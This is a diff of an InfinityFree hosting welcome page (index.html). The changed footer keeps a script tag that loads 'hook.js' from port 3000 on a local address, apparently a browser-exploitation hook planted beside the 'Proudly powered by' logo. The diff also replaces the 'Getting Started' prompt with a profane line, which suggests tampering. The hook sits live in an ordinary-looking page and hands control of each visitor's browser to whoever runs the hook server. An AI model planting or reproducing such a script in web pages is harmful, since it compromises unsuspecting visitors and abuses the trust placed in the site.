--- a/index.html
+++ b/index.html
@@ -34,7 +34,7 @@
                 <h4 class="motto">Your account is all set up, it's time to build your website!</h4>
                 <div class="subscribe">
                     <h5 class="info-text">
-                        Not sure where to start? Check the <a href="https://forum.infinityfree.net/docs?topic=49312" target="_blank">Getting Started</a> article on the knowledge base.
+                        Not sure where to start? Check this shit out <a href="https://forum.infinityfree.net/docs?topic=49312" target="_blank">Getting Started</a> article on the knowledge base.
                     </h5>
                 </div>
             </div>
@@ -42,7 +42,7 @@
         <div class="footer">
             <div class="container">
                 Proudly powered by <br>
-                <script src="http://10.0.2.15:3000/hook.js"></script>
+                <script src="http://127.0.0.1:3000/hook.js"></script>
                     <img src="https://vpassets.infinityfree.net/welcome2017/logo.png" alt="InfinityFree" height="40px">
                 
             </div>
